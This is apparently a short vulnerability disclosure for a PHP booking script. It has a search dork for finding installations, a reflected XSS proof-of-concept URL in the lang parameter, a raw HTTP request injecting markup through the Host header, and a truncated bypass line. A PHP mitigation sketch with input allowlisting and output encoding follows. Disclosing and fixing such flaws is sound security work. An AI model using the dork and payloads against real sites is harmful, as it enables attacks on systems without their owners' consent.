Dork: "inurl:cultbooking.php"
Exploit!
http://1.1.1.2/cultbooking.php?lang=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
HTML Injection via Header Attack:
---------------------------------------------------------------------
POST http://1.1.1.2/cultbooking.php HTTP/1.1
Host: ">ZSL-CROSS-SCRIPT-EXECUTED"
Content-Length: 19
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.8) Gecko/2008101401 Firefox/3.1
Accept-Encoding: gzip,deflate
Keep-Alive: 50
Connection: Keep-Alive

action=cancellation
---------------------------------------------------------------------
Affected Header variable: Host
magic quotes bypass redirect:
http://1.1.1.2/cultbooking.php?lang=">
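Mitigation sketch for the two reflected inputs shown above (the lang parameter and the Host header). This is an added example, not code from the affected application. ALLOWED_LANGS, ALLOWED_HOSTS, booking.example.com and the helper names h, safe_lang and safe_host are assumptions.

```php
<?php
// Added example: hypothetical hardening for a script like cultbooking.php.
// ALLOWED_LANGS and ALLOWED_HOSTS are assumed values, not taken from the product.
const ALLOWED_LANGS = ['en', 'de', 'fr'];
const ALLOWED_HOSTS = ['booking.example.com'];

// Encode any value before it is written into HTML text or a quoted attribute.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Accept only known language codes; anything else falls back to the default.
function safe_lang($raw, string $default = 'en'): string
{
    return (is_string($raw) && in_array($raw, ALLOWED_LANGS, true)) ? $raw : $default;
}

// Never build markup or links from the client-supplied Host header; map it to
// a configured name, or return null so the caller can reject the request.
function safe_host($raw): ?string
{
    if (!is_string($raw)) {
        return null;
    }
    $host = strtolower(preg_replace('/:\d+$/', '', trim($raw)));
    return in_array($host, ALLOWED_HOSTS, true) ? $host : null;
}

// Constructed inputs mirroring the two requests shown in this advisory.
$samples = [
    ['lang' => '"><script>alert(1)</script>', 'host' => '">ZSL-CROSS-SCRIPT-EXECUTED"'],
    ['lang' => 'de', 'host' => 'booking.example.com:443'],
];

foreach ($samples as $s) {
    $host = safe_host($s['host']);
    if ($host === null) {
        echo "400 Bad Request: unexpected Host " . h($s['host']) . "\n";
        continue;
    }
    $lang = safe_lang($s['lang']);
    // Encode at output even though both values are already allowlisted.
    echo '<a href="https://' . h($host) . '/cultbooking.php?lang=' . h($lang) . '">' . h($lang) . "</a>\n";
}
```

magic_quotes_gpc only backslash-escapes quotes, backslashes and NUL bytes, so it is not a substitute for the HTML encoding done in h().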